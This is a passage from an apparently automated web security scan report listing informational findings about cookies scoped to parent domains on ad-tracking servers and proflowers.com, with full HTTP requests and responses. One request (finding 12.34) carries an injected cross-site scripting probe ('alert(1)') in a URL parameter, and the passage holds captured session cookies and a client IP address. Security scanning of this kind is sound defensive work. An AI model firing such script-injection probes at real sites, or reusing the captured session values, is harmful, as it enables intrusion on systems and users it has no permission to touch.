rsi_us_1000000="pUMlIz9DOAYU1O2uA3Nf1wgg9Tpn7P+LBAm++DA1mQ19Ktk0xHsNbUdnssfo0Gg2GtNOjezP3rQsX+ieC4o2fHI9QkQeov8FSjRptD7ENVbUid4nnMJw2upjcbtYuTDvN446ehF3GgXLLZTbonI4jYrOBasvRFfMnkE53wY4Qa+hKdx6gukgA/85R9jXhtGV7/piYr5YQZgjMiKl8zWjUoD0F3UhqKyr9Id97BfRNHCeDUiGyQYV3IR679d+6Fpy0gp1Hq2XjxlJKDOqjAs1Uw1dudiAIQw7rizeuLD3XUC+e/mDTPH7BnVmGnFlHpoxfT7YsL0wt1TCMgGvoSIbnMIU57JYoUftomTxWnNTVj2NzOwDjpZIg48YPTnIgihnfbJxlqTqbhkTFxz+dV3nEMImFBKzd64qvE1zt38WPal3ooNbYqY4hIZWj8N4pKHLwHPyWzs/CsI6rWRhrWMPRaUafMfQn/v0U75IJgD8TGuloOwC16CAbvKgsBHdSES2thl/yLffPkkgsVchivYvx1DIgzI+Hp2cwp15/JafWYD1uqtnSaqyiY5cSyX1S9pZYVMWf8I99X0PmkHmiE+AmJ2pOIUjqqv8lHsXuUlO5LZo1crEog7F/asoNmA7+b1HAp4GyFPw8IccpCRD55tkYzvfpalmWhSIak/31maiBYBGTGdMPAhhPIWehJXnhsO0s79zhTvo+mhSTEb31vIjsG19H8uhSlb70Xz/RdUHnSSFQu2fn9OoA0ULdTsbgEYRNxte1+V4Vu5pclZS/SluGYRGqFciUTHH7jlTzS7r4Od1PDbqHOXOoGhgdQKRwlGytvhlJ3xpN38TeBBvuSli78zJal5w2RgiXvdzsle4GypMSBJTlBFpkLcvXbok3eHAtIL39rfw/UIu83ImxrDg6smRtaoCYqy6FrPvEOZvbHeZKJ1G6PoYEXV8RC7c5ut/7o1FJqaAV9fv+dLKW/LayYdfhFv6v33uPJSN5cTsetqde/n2tODUxKQxVKARJrsoIbuTvqK0rkezL0LMNB5mMi30PtNyanRSr/WUuwQZpJ60S6tI3fUgKWeajoXdlSIz4FFghQ9I+YJhmXQ9IxhQqDK+BwrtqJ+G/7aCwcyCBYmRkfHJc/Flc9ttNYB8QLSGHHxZcNV7DJc5sT00OUsUVmrKDXWc+nRcX1WiQ/VkP0PS/bC1/DbhNecPWVRE0AXkOh/IOoVf06+8SOgC8Ev3jO0RbucQa8aazOvezkk7zeyQCkyl2Mc4X9xCgxUsXK9DtZSCJK6m2R/mQCTbaItUg3/6EIcy8zL2Scsdi6aQPsU9UrkfVegfH0Uty3GkCV77GW5oseV6DHz9+RNhUmepmjvJu5cKj0grDAv9MP790ikGiL9Vbfl+2hPsPfIsGhjWXsvCaPLDLnnlLu7s6jCtbDAg+6/AWwustsHfWZNO9mP2B2hNB72eXivVKC3ScCpTMJq/yXGNl7gyrzILPyfzvctlhE7tAAL1KCRqQVBYdg=="

Response

HTTP/1.1 302 Moved Temporarily
Server: Apache-Coyote/1.1
Set-Cookie: rtc_dGQ8=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF4zOhOAIMpzbh+EW4hpixLq0GQ6VJBS3B3AJ2lIpZKid5Bk8CBcvtjTU1pj8gP1jKG78pMfrrd5ZBGsJfD0QJWyaDFaFmfmF08TRNeK3vxtK30PogMNGUt7RVHYp4KOkQyH3jOhyI3uNf6F9/vqTOvR5x+moIVmc0TUC3mXnaW2egq/Qzgu4Ww9iZZEXOULmtbZ0zv58VVKxkKPtsFhl62M9NeGkRuwqq2T0rQsRDYIU4lZQIEcxBQePwIBHAdekpt/HRg5xeTyxMruLCHrUlqnAvH0met8d+ElR2hKyFDfLAnvq2QeZ+ROpJjAcS0ZTXzXic4c4h0spLvmQu7UnsrpWbJ1h5SGY3k3b1vgVQORb7wUFtdNFy8Ts6muDd7dApAZXifn/tV2DQGX/WbGNqCf8xBYYSIhPnMm+QAnzFe/4wCNcPOF15jNiRW9RWJvQden4ZUXKJgMJwJPIzbWCpC9U4Ds7idPOe3oTGmKxyXtm6W7hnD2kkLo3f+FCp9k0j1gIe8JLfAMAGWbPA1uDj2m7mt2Y07JoVegrWYDFJ; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
Set-Cookie: rtc_OGR2=MLvntzM1ZwprJ5GrZptPU8kfvO50XCqRdbbBVCzWA7wKgWGALKgYuCgokRUkKaVbf6iua6BFIG+TILu7TbUmMXZ4av8HRAe4KYFLWnH2fWgnisgOGBeZmmKUqquUkgC4hRzXGKFab7Lb9B59JNOJ/xFb8GBXg5jvFxrHVbli/8Zor/9ChiL4/bQm6TO6TWxu4AgYzNZ72h1XqxtG9p0MdrNQe3LHXC6fnG1kByw3zyobXTfPi4DPALx4NKQns9E+z57ujh9chYrntouXx7ACuW4riwKRXnGFWaXd9XYjGOfk1HcOLoD/R5QVFVRuoMUGopU31HECElX6E2bfLU+9tdIDU+kUTRCmWr5JLrb87Jt7OVaoLAq/85Y9Ms44mJIcn0rkW9LUePFWksHE2CoKDepJjuyWa3ETKZ0Aq9xaUXtHIO3c28po3oYn6A8ZpH3iIktkPZLMJm2IsaHRp5SdnL4h/haqoSoy+G0JIgrh9+YoXKMNIUuxY8Hsb1z7aJDhNimaKb2aalXhIMbWA7etx8/6CzIr88c0OddsBPCHXCJIddMXYFgBI6+8PXCr8hQLd2ICbxdDKY7scjurnOw05lMFkma6YksmU9q2R2zn2ajltv5jpc00N/GUaqd7lFY7wi+33n9K2dHnDyqe2AWfOsKZeN7pBeT9lJqwcq6za++tJckSpQd8Np0e+b5H29rw2ZkqFHmdRcDtJ0ne+0DA5+zwohtVTNp7a5TBfAwnlfZ07CddeADkdqY+9Ngfj1gSsmBTivZBx9XEnRMrLnmeE2SPBab+WsIc/dOvBYfymKPtuyg7ANae+sxwmf/gJVGxYYlBZ9uHupi17rZAniqBNddhUmuqJoZJKQ+Gryj+0HeBIpYNjHxMGjndI8DLD4ELT6ZIPmijIaC/DL0eQYkcP9TcXBMOEhg7h8af15wUtndadKLvnQ2fLYsJ5ZYKfHc4xImm/XGb4yo0MgL7eJokNFX37BpCpEpncs9aC6Uy9LFtas6VSGf3a4/u+RqaWD7M8z8Hjqn3p5g70qm83Sx9hv7HiudM4ekcQQcm3rFe5RNB2yMfXWPnGeriO8IA64YLzH6adffaB6BBVdjfXTxnqIa3jTBTiBQtc24eDqBLafRWpwCJfAZjjxOZVZUxg2DAxJIfkT1QWphzCXkIPL9hUCYaJH0pHMVM0F/oAlXEPpEQW5pwrauue6TVqIKlQcAlnVabYJRpUFSEp0taV8MknpG5owQC20y7BfggSb/I74viqZvRKAHemiJM2Zoy/XCCnDNb24svlN7Wk815hWml+5yHBuHiOwGhDPYmJAQ8WKx3BLduOn80UZ5yRj4KiS94Z5AOLBJojzSBCuqhf3XJdWfaheh5ogEr+OpcEbkzbnPKuv3wbHYlyYfYZzzSJjZnHwveZGHLfJw5hRPIOguoeynfb8pi3L9wnmCtiIG/W+rLac5yPWgI2quVhRGozXl0Hr/7+LPz1zwP+ET482CD/BXd4v3bh/84xeB8VAs/TUJ7byaeEQMNWsn7jXMbBvSzv+zJOkCfiZyLa8GWQA8=; Domain=.revsci.net; Expires=Tue, 08-May-2012 01:18:55 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Location: http://ads.revsci.net/adserver/ako?activate&type=gif&csid=K10145
Content-Length: 0
Date: Mon, 09 May 2011 01:18:54 GMT

12.30. http://pixel.fetchback.com/serve/fb/pdc  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.fetchback.com
Path:   /serve/fb/pdc

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /serve/fb/pdc?cat=&name=landing&sid=3006 HTTP/1.1
Host: pixel.fetchback.com
Proxy-Connection: keep-alive
Referer: http://ww30.1800flowers.com/collection.do?dataset=10305
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uat=1_1304506950; cmp=1_1304902865_11051:0_13981:207803_13479:207803_15758:367136_12704:367136_4895:795321_10164:1159597_10638:1159597_10640:1159597_10641:1159597_1437:1159597_1660:1723193; uid=1_1304902865_1303179323923:6792170478871670; kwd=1_1304902865_12936:207803_11317:1159597_11717:1159597_11718:1159597_11719:1159597; sit=1_1304902865_3006:0:0_3455:207803:207803_2988:430083:395912_3801:542526:542106_1714:827059:795321_3306:1054685:367136_719:1160424:1159597_2451:1211293:1206193_3236:1369256:1369138_782:1723542:1723193; cre=1_1304902865_29802:59536:1:541894_29805:59534:1:542555; bpd=1_1304902865_1ZCU5:4QMi; apd=1_1304902865; scg=1_1304902865; ppd=1_1304902865; afl=1_1304902865

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:01:13 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: cmp=1_1304902873_11051:0_13981:207811_13479:207811_15758:367144_12704:367144_4895:795329_10164:1159605_10638:1159605_10640:1159605_10641:1159605_1437:1159605_1660:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: uid=1_1304902873_1303179323923:6792170478871670; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: kwd=1_1304902873_12936:207811_11317:1159605_11717:1159605_11718:1159605_11719:1159605; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: sit=1_1304902873_3006:8:0_3455:207811:207811_2988:430091:395920_3801:542534:542114_1714:827067:795329_3306:1054693:367144_719:1160432:1159605_2451:1211301:1206201_3236:1369264:1369146_782:1723550:1723201; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: cre=1_1304902873_29802:59536:1:541902_29805:59534:1:542563; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: bpd=1_1304902873_1ZCU5:4QMq; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: apd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: scg=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: ppd=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Set-Cookie: afl=1_1304902873; Domain=.fetchback.com; Expires=Sat, 07-May-2016 01:01:13 GMT; Path=/
Cache-Control: max-age=0, no-store, must-revalidate, no-cache
Expires: Mon, 09 May 2011 01:01:13 GMT
Pragma: no-cache
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 290

<!-- campaign #11051 is eligible -->
<![if !IE 6]>
<script language='javascript' type='text/javascript'>
function timeout(){location.replace('http://pixel.fetchback.com/timeout.html');}
setTimeout(tim
...[SNIP]...
12.31. http://pixel.quantserve.com/pixel/p-0fxbD82AR3K-g.gif  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /pixel/p-0fxbD82AR3K-g.gif

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /pixel/p-0fxbD82AR3K-g.gif?labels=_fp.event.Welcome HTTP/1.1
Host: pixel.quantserve.com
Proxy-Connection: keep-alive
Referer: http://adsfac.us/pct_mx.asp?L=305606&source=if
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: mc=4dab4f93-dea96-f475f-85ff7; d=EIcAGO8kjVmtjIMIufKMgQG7AQHYBoG0AJrRo5lYEPGaOCbTzF4os9HUosxSCyo0wR_hEMIAwfEIICDSDiAJ0Tu2CpGSx0MQIRgguzLBLTOBKCAwLh6DS1OfFABNIA6JIA4QC-ILZLEIJIstOUo4sjA

Response

HTTP/1.1 200 OK
Connection: close
Set-Cookie: d=EJcAJe8kjVmM-5GL0ZmY8frRi58oyBABuwEB2gaB9ACa0aOZWBDxmjgm08xeKLPR1KLMUgsqNMEf4RDCAMHxCCAg0g4gCdE7tgqRksdDECEYILsywS0zgSggMC4eg0tTnxQATSAOiSAOEAviC2SxCCSLLTlKOLIw; expires=Sun, 07-Aug-2011 01:01:00 GMT; path=/; domain=.quantserve.com
P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV"
Content-Type: image/gif
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 09 May 2011 01:01:00 GMT
Server: QS

GIF89a.......,.................D..;
12.32. http://pixel.rubiconproject.com/tap.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pixel.rubiconproject.com
Path:   /tap.php

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /tap.php?v=5970|1|14 HTTP/1.1
Host: pixel.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://pixel.fetchback.com/serve/fb/pdc?cat=&name=landing&sid=3006&abandon_products=91637
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_2025=549188a1-a07c-4231-be94-7f725e1a19f7; au=GMMM871R-KIRO-10.208.77.156; put_2081=AM-00000000030620452; put_2146=6wa51p1zbco8b5ocw49utyfiu6fa98yq; put_1197=3419824627245671268; put_1430=c1e1301e-3a1f-4ca7-9870-f636b5f10e66; put_1185=2931142961646634775; put_2100=usr3fd49cb9a7122f52; csi9=3188005.js^1^1304340479^1304340479; put_1512=4dab7d35-b1d2-915a-d3c0-9d57f9c66b07; put_2101=8218888f-9a83-4760-bd14-33b4666730c0; put_1523=9QQxcTO5uH2Ia7Bk4vGS2S96ufOGsSDC; put_2132=978972DFA063000D2C0E7A380BFA1DEC; lm="2 May 2011 12:48:41 GMT"; put_1994=xrd52zkwjuxh; khaos=GMMM8SST-B-HSA1; csi15=3153732.js^1^1304367467^1304367467&3166422.js^1^1304366186^1304366186&3140642.js^2^1304363213^1304364698&3167237.js^2^1304361606^1304361617&3200915.js^1^1304360968^1304360968&3203914.js^3^1304360291^1304360963&3190993.js^3^1304358760^1304359002&3151969.js^2^1304340485^1304341092&3151966.js^2^1304340392^1304340510&3199969.js^1^1304340482^1304340482&3186719.js^2^1304340387^1304340476&3188306.js^1^1304340471^1304340471&3196947.js^1^1304340427^1304340427&3201778.js^1^1304340414^1304340414&3151650.js^3^1304340335^1304340359; ruid=154dab7990adc1d6f3372c12^8^1304807875^2915161843; csi2=3204821.js^1^1304807875^1304807875; rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1; rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C; put_1986=2724386019227846218; cd=false

Response

HTTP/1.1 200 OK
Date: Mon, 09 May 2011 01:02:40 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.3
P3P: CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Set-Cookie: rpb=5328%3D1%265671%3D1%264210%3D1%265852%3D1%264214%3D1%262939%3D1%264140%3D1%264212%3D1%264554%3D1%266073%3D1%264222%3D1%266286%3D1%262786%3D1%264940%3D1%262372%3D1%262111%3D1%262202%3D1%262110%3D1%262112%3D1%263810%3D1%262374%3D1%265864%3D1%265487%3D1%266552%3D1%264894%3D1%265970%3D1; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.rubiconproject.com
Set-Cookie: rpx=5328%3D11319%2C0%2C1%2C%2C%265671%3D11319%2C0%2C1%2C%2C%264212%3D11319%2C261%2C2%2C%2C%266286%3D11319%2C349%2C2%2C%2C%262372%3D11319%2C0%2C1%2C%2C%262374%3D11319%2C0%2C1%2C%2C%266073%3D11319%2C349%2C3%2C%2C%264210%3D11319%2C0%2C1%2C%2C%265852%3D11319%2C0%2C1%2C%2C%264222%3D11319%2C349%2C3%2C%2C%264894%3D11396%2C402%2C3%2C%2C%264554%3D11415%2C242%2C3%2C%2C%264214%3D11415%2C0%2C1%2C%2C%262939%3D11502%2C0%2C3%2C%2C%264140%3D11530%2C3%2C6%2C%2C%266552%3D11532%2C191%2C3%2C%2C%262786%3D11669%2C0%2C1%2C%2C%262111%3D11669%2C0%2C1%2C%2C%262112%3D11669%2C0%2C1%2C%2C%262202%3D11669%2C0%2C1%2C%2C%263810%3D11669%2C0%2C1%2C%2C%264940%3D11670%2C0%2C1%2C%2C%265864%3D11678%2C0%2C1%2C%2C%262110%3D11678%2C0%2C1%2C%2C%265487%3D11723%2C0%2C1%2C%2C%265970%3D11825%2C0%2C1%2C14%2C; expires=Wed, 08-Jun-2011 01:02:40 GMT; path=/; domain=.pixel.rubiconproject.com
Content-Length: 49
Content-Type: image/gif

GIF89a...................!.......,...........T..;
12.33. http://products.proflowers.com/flowers/Deluxe-Mothers-Day-Bouquet-30050137  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Mothers-Day-Bouquet-30050137

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Mothers-Day-Bouquet-30050137?trackingpgroup=HPC&tile=hmpg_carousel&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; CURRENTSESSION_=IPAddress=173.193.214.243; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; s_cc=true; RES_TRACKINGID=674723556265235; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253Ahome%25253Ahome%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Mothers-Day-Bouquet-30050137%25253Ftrackingpgroup%25253DHPC%252526tile%25253Dh%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
X-AspNet-Version: 4.0.30319
Set-Cookie: ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; path=/; HttpOnly
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:50 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:08:50 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:08:51 GMT
Content-Length: 144498


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
12.34. http://products.proflowers.com/flowers/Deluxe-Succulent-Garden-30008396  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/Deluxe-Succulent-Garden-30008396

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/Deluxe-Succulent-Garden-30008396?viewpos=1&trackingpgroup=PBS&tile=hmpg_podA1abf9%5c%22%3balert(1)%2f%2fe408dc57373&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA1abf9\%22%3balert(1)//e408dc57373&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; MAX_PFC=ContentTrackingViews=ntraccountmanagementbanner1-NFX,NFX; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253Aproductgroup%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FDeluxe-Succulent-Garden-30008396%25253Fviewpos%25253D1%252526trackingpgroup%25253DPBS%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:16:38 AM?30008396&5/9/2011 5:18:27 AM; domain=.proflowers.com; expires=Sun, 07-Aug-2011 12:18:27 GMT; path=/
X-Powered-By: ASP.NET
Date: Mon, 09 May 2011 12:18:27 GMT
Content-Length: 136888


<noscript>
<div class="splashBox">
   <p>We...re Sorry - </p>
   <p style="border-bottom: 1px solid #fff786;"><b>Your browser does not have Javascript enabled</b>. Our site requires javascript to bro
...[SNIP]...
12.35. http://products.proflowers.com/flowers/The-Ultimate-Office-Plant-30003767  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://products.proflowers.com
Path:   /flowers/The-Ultimate-Office-Plant-30003767

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flowers/The-Ultimate-Office-Plant-30003767?viewpos=6&trackingpgroup=PBS&tile=hmpg_podA&Ref=HomeNoRef HTTP/1.1
Host: products.proflowers.com
Proxy-Connection: keep-alive
Referer: http://www.proflowers.com/house-plants-PBS?tile=hmpg_podA&Ref=HomeNoRef
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BrowsingStore=kta3enb3gd0epyjr2evspqf1; THIRTEENMONTHS_PFC=TestAssignmentValues=xpa-1,xpb-1,prh-1,pfl-0,pvo-2,pmt-3,pfb-0,pec-3,ntc-1,ntd-2,pbo-5,nte-2,phl-2,ppv-3,phr-2,nta-1,xpc-1,ntb-1,pnp-3,ppr-2,pmm-2,pem-1,pfe-3,pml-0; ENDOFDAY_PFC=TestAssignmentValues=,pxc-1,mpsmediapersonalitysplit-2,zzd-2,pku-1,zze-1,pxa-2,pxb-1,pkt-1,pkv-2,zzf-2,pks-3,psr-2,apg-1; CURRENTSESSION_PFC=TestConfigDateTimeUpdated=5/9/2011 5:07:56 AM; PRVD=SiteSplitID=27; PFC_BrowserId=91621bab-4967-45f8-ad8e-98be730e6e4a; PFC_PersInfo=VgNJwQZqqM5wKnWNOPfi6GrSg0Ytqi06Ix75Mz0HR141; RES_TRACKINGID=674723556265235; s_vi=[CS]v1|26E3EC9B05013719-40000104400A2F48[CE]; ASP.NET_SessionId=kta3enb3gd0epyjr2evspqf1; CURRENTSESSION_=IPAddress=173.193.214.243&PageSortProp5=na:na:na:na; ProductDetail_RecentlyViewed_PFC=30050137&5/9/2011 5:08:38 AM?0&5/9/2011 5:10:50 AM; s_cc=true; RES_SESSIONID=612828374374657; ResonanceSegment=1; s_sq=proflodevelopment%3D%2526pid%253DPFC%25253ACategory%25253APBS%2526pidt%253D1%2526oid%253Dhttp%25253A%25252F%25252Fproducts.proflowers.com%25252Fflowers%25252FThe-Ultimate-Office-Plant-30003767%25253Fviewpos%25253D6%252526trackingpgroup%25253DP%2526ot%253DA

Response

HTTP/1.1 200 OK
Cache-Control: private,no-cache, no-store
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
